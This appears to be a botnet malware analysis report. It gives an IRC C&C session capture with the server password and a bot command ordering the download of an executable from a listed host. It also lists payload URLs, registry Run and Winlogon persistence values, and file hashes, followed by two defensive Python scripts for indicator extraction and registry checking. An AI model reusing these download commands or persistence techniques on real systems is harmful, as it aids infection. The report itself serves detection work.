US hosting is still involved in botnet hosting
Remote Host       Port
208.53.183.219    80
208.53.183.73     80
208.53.183.92     80
98.126.44.98      8100   (IRC C&C server; the bot authenticates with PASS laorosr)
IRC session with 98.126.44.98:8100, as captured:
MODE #! -ix
MODE #Ma -ix
USER SP2-650 * 0 :COMPUTERNAME
MODE [N00_USA_XP_9718720]
@ -ix
MODE #dpi -ix
Joins channel: :#!
#! :.asc-S|.http http://208.53.183.217/use13.exe|.asc exp_all 30 5 0 -a-r -e|.asc exp_all 30 5 0 -b -r-e|.asc exp_all30 5 0 -b|.asc exp_all 30 5 0 -c|.asc exp_all 30 5 0 -a
nick [N00_USA_XP_4967390]
USER SP2-078 * 0 :COMPUTERNAME
The line beginning "#! :" is the topic of channel #!, which carries the bot's command string as pipe-separated commands: ".http" points the bot at http://208.53.183.217/use13.exe (a fourth host in the same 208.53.183.0/24 range as the three web servers listed above), followed by a series of ".asc exp_all" orders. The bot nicks encode country and OS ([N00_USA_XP_<id>]), which is how the operator sorts victims.
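To turn a capture like the one above into indicators, the following script pulls the server password, bot nicks, idents, channels, topic commands and download URLs out of the session lines. This is an added example written for this page, not code from the original report or from the bot. CAPTURE reproduces the session lines quoted above plus one constructed "PASS laorosr" line standing in for the password the report notes next to 98.126.44.98:8100; reading ".asc exp_all" as a scan/spread order is an assumption, since the report does not document the bot's command set.

```python
"""Extract C&C indicators from the captured IRC bot session above.

Added example for this page, not part of the original report. CAPTURE
reproduces the session lines quoted above; the "PASS laorosr" line is
constructed from the report's note "PASS laorosr ircd here". Treating
".asc exp_all ..." as a scan/spread order is an assumption.
"""
import json
import re

CAPTURE = [
    "PASS laorosr",  # constructed: server password noted in the report
    "MODE #! -ix",
    "MODE #Ma -ix",
    "USER SP2-650 * 0 :COMPUTERNAME",
    "MODE [N00_USA_XP_9718720]",
    "@ -ix",
    "MODE #dpi -ix",
    "Joins channel: :#!",
    "#! :.asc-S|.http http://208.53.183.217/use13.exe|.asc exp_all 30 5 0 -a-r -e"
    "|.asc exp_all 30 5 0 -b -r-e|.asc exp_all30 5 0 -b|.asc exp_all 30 5 0 -c"
    "|.asc exp_all 30 5 0 -a",
    "nick [N00_USA_XP_4967390]",
    "USER SP2-078 * 0 :COMPUTERNAME",
]

# Bot nick as seen in the capture: [N00_USA_XP_4967390] = group, country, OS, id.
NICK_RE = re.compile(
    r"\[(?P<grp>[A-Z]\d{2})_(?P<cc>[A-Z]{2,3})_(?P<os>[A-Z0-9]+)_(?P<id>\d+)\]"
)
PASS_RE = re.compile(r"^PASS\s+(?P<pw>\S+)$")
USER_RE = re.compile(r"^USER\s+(?P<ident>\S+)\s+\S+\s+\S+\s+:(?P<realname>.*)$")
CHAN_RE = re.compile(r"(?:^|\s):?(#[^\s:|]+)")          # #!, #Ma, #dpi
TOPIC_RE = re.compile(r"^(?P<chan>#\S*)\s+:(?P<body>\..*)$")  # "<chan> :.cmd|.cmd"
URL_RE = re.compile(r"https?://[^\s|]+")


def parse_bot_commands(body):
    """Split the pipe-separated topic into (verb, args) pairs; verbs start with '.'."""
    cmds = []
    for part in body.split("|"):
        part = part.strip()
        if not part.startswith("."):
            continue
        verb, _, args = part.partition(" ")
        cmds.append((verb, args.strip()))
    return cmds


def nick_fields(nick):
    """Decompose a bot nick into its fields, or None if it is not in the bot format."""
    m = NICK_RE.fullmatch(nick)
    return m.groupdict() if m else None


def parse_capture(lines):
    """Walk the session lines and collect C&C indicators into one dict."""
    ioc = {
        "server_password": None,
        "bot_nicks": [],
        "idents": [],
        "channels": [],
        "commands": [],
        "download_urls": [],
        "spread_orders": 0,   # count of ".asc" orders (assumed scan/spread)
    }
    for raw in lines:
        line = raw.strip()
        if m := PASS_RE.match(line):
            ioc["server_password"] = m.group("pw")
        for m in NICK_RE.finditer(line):
            if m.group(0) not in ioc["bot_nicks"]:
                ioc["bot_nicks"].append(m.group(0))
        if m := USER_RE.match(line):
            ioc["idents"].append(m.group("ident"))
        for chan in CHAN_RE.findall(line):
            if chan not in ioc["channels"]:
                ioc["channels"].append(chan)
        if m := TOPIC_RE.match(line):
            for verb, args in parse_bot_commands(m.group("body")):
                ioc["commands"].append((verb, args))
                if verb == ".http":           # download-and-execute order
                    ioc["download_urls"].extend(URL_RE.findall(args))
                elif verb == ".asc":          # assumed scan/spread order
                    ioc["spread_orders"] += 1
    return ioc


if __name__ == "__main__":
    print(json.dumps(parse_capture(CAPTURE), indent=2))
```

The same regexes can be dropped into an IDS content match or a log search: a NICK or USER line matching NICK_RE on a non-standard port, or a topic whose body starts with "." and contains ".http", is a strong signal on its own.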
Other details
* The following port was open in the system:
Port Protocol Process
1057  TCP       cfdrive32.exe (%Windir%\cfdrive32.exe)
* The data identified by the following URLs was then requested from the remote web servers:
o http://208.53.183.219/serv6.exe
o http://208.53.183.73/foxjbewj._
o http://208.53.183.92/usa.exe
Registry Modifications
* The following Registry Keys were created:
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
+ Microsoft Driver Setup = "%Windir%\cfdrive32.exe"
so that cfdrive32.exe runs every time Windows starts (this is the Group Policy "run at logon" list, normally empty on a clean host)
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+ Microsoft Driver Setup = "%Windir%\cfdrive32.exe"
so that cfdrive32.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
+ Taskman = "%AppData%\oekx.exe"
so that Winlogon launches oekx.exe at every interactive logon
Memory Modifications
* There were new processes created in the system:
Process Name    Process Filename        Main Module Size
cfdrive32.exe   %Windir%\cfdrive32.exe  339 968 bytes
9188.exe        %Temp%\9188.exe         339 968 bytes
File System Modifications
* The following files were created in the system:
1. %AppData%\oekx.exe [file and pathname of the sample #1]
   File Size: 98 304 bytes
   MD5: 2FDB85B02FE089750F7F3B7183279012
   SHA-1: EF5BFE39F0E410E88D8171EE9BCB11578F29645D
   Alias: W32/Rimecud.gen.l [McAfee]
2. %Temp%\474.exe
   File Size: 2 182 bytes
   MD5: E193D9CE690D7FCD592FF6B92357783F
   SHA-1: A6FA1E134460D33E5DA411534C0969EBB99475B3
   Alias: (not available)
3. %Temp%\614988.exe
   File Size: 36 864 bytes
   MD5: ACF1E44740A7533C1C5A262D447FBCF2
   SHA-1: 33D289CD1A03CA6449CF5D9E131784F2EAE9407C
   Alias: VirTool:Win32/Injector.T [Microsoft], Virus.Win32.Injector [Ikarus]
4. %Temp%\9188.exe, %Windir%\cfdrive32.exe
   File Size: 167 936 bytes
   MD5: 6592DB13E7E8AD89991429A0CC6D5CEA
   SHA-1: B170F75E1428F8D2178D6883429FF5932B81344C
   Alias: W32/Rimecud.gen.m [McAfee], Virus.Win32.Vitro [Ikarus]
5. %Windir%\Temp\scs1.tmp
   File Size: 2 686 bytes
   MD5: 4A587187D760161311010B03417B3C3F
   SHA-1: 863BBF5F7F4114A1307C6BAD5DD89224D511FED5
   Alias: (not available)
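For checking other hosts against the registry and file indicators in the two sections above, the script below parses an exported .reg hive offline, flags the autostart values the report shows being written, and looks up file hashes against the report's table. This is an added example written for this page, not code from the original report. SAMPLE_REG is constructed to mirror the report's findings (with one benign Run entry added for contrast), and only the REG_SZ subset of .reg syntax is handled.

```python
"""Offline check of a .reg export for the persistence values and file hashes
listed in the report above.

Added example for this page, not part of the original report. SAMPLE_REG is
constructed to mirror the report's findings plus one benign Run entry.
"""
import re

# Autostart keys the report shows being written -> value names to check
# (None = every value under the key).
AUTOSTART_KEYS = {
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run": None,
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run": None,
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon": {"Taskman"},
}
# policies\Explorer\Run (the Group Policy run-at-logon list) and Winlogon\Taskman
# are empty on a typical host, so any value there is worth reporting on its own.
RARE_KEYS = set(list(AUTOSTART_KEYS)[1:])

IOC_FILENAMES = {"cfdrive32.exe", "oekx.exe", "9188.exe", "474.exe", "614988.exe", "scs1.tmp"}
IOC_HASHES = {  # MD5 and SHA-1 from the report's file table, lowercased
    "2fdb85b02fe089750f7f3b7183279012": "oekx.exe / W32/Rimecud.gen.l",
    "ef5bfe39f0e410e88d8171ee9bcb11578f29645d": "oekx.exe / W32/Rimecud.gen.l",
    "e193d9ce690d7fcd592ff6b92357783f": "474.exe",
    "a6fa1e134460d33e5da411534c0969ebb99475b3": "474.exe",
    "acf1e44740a7533c1c5a262d447fbcf2": "614988.exe / VirTool:Win32/Injector.T",
    "33d289cd1a03ca6449cf5d9e131784f2eae9407c": "614988.exe / VirTool:Win32/Injector.T",
    "6592db13e7e8ad89991429a0cc6d5cea": "cfdrive32.exe / W32/Rimecud.gen.m",
    "b170f75e1428f8d2178d6883429ff5932b81344c": "cfdrive32.exe / W32/Rimecud.gen.m",
    "4a587187d760161311010b03417b3c3f": "scs1.tmp",
    "863bbf5f7f4114a1307c6bad5dd89224d511fed5": "scs1.tmp",
}

# Constructed export: what `reg export` would produce on an infected XP host.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"VMware Tools"="\"C:\\Program Files\\VMware\\VMware Tools\\VMwareTray.exe\""
"Microsoft Driver Setup"="\"C:\\WINDOWS\\cfdrive32.exe\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"Microsoft Driver Setup"="\"C:\\WINDOWS\\cfdrive32.exe\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="Explorer.exe"
"Taskman"="\"C:\\Documents and Settings\\user\\Application Data\\oekx.exe\""
"""

SECTION_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<data>.*)"$')


def unescape(data):
    """Undo .reg string escaping: \\\\ -> \\ and \\" -> "."""
    return re.sub(r'\\(["\\])', r"\1", data)


def parse_reg_export(text):
    """Parse [key] sections and "name"="data" (REG_SZ) lines into {key: {name: data}}."""
    hive, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if m := SECTION_RE.match(line):
            current = m.group("key")
            hive.setdefault(current, {})
        elif (m := VALUE_RE.match(line)) and current is not None:
            hive[current][m.group("name")] = unescape(m.group("data"))
    return hive


def image_name(data):
    """Lower-cased basename of the executable in a command string like "C:\\x\\y.exe" -a."""
    path = data.strip().strip('"').split('"')[0]
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_persistence(hive):
    """Return (key, value name, data, reason) for every suspicious autostart value."""
    findings = []
    for key, wanted in AUTOSTART_KEYS.items():
        for name, data in hive.get(key, {}).items():
            if wanted is not None and name not in wanted:
                continue
            if image_name(data) in IOC_FILENAMES:
                findings.append((key, name, data, "image name matches report IOC"))
            elif key in RARE_KEYS:
                findings.append((key, name, data, "value in rarely used autostart location"))
    return findings


def lookup_hash(digest):
    """Map an MD5/SHA-1 hex digest (with or without 0x) to the report's alias, or None."""
    d = digest.strip().lower()
    if d.startswith("0x"):
        d = d[2:]
    return IOC_HASHES.get(d)


if __name__ == "__main__":
    for key, name, data, reason in find_persistence(parse_reg_export(SAMPLE_REG)):
        print(f"{reason}: [{key}] {name} = {data}")
```

On a live host the same checks can be run against `reg export HKLM\SOFTWARE hklm_software.reg`; the Run entry that does not match an IOC name (VMware Tools) is left alone, while anything under policies\Explorer\Run or in Winlogon\Taskman is reported even if the filename is unknown.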
More information about the hosting providers (whois):
http://whois.domaintools.com/98.126.44.98
http://whois.domaintools.com/208.53.183.219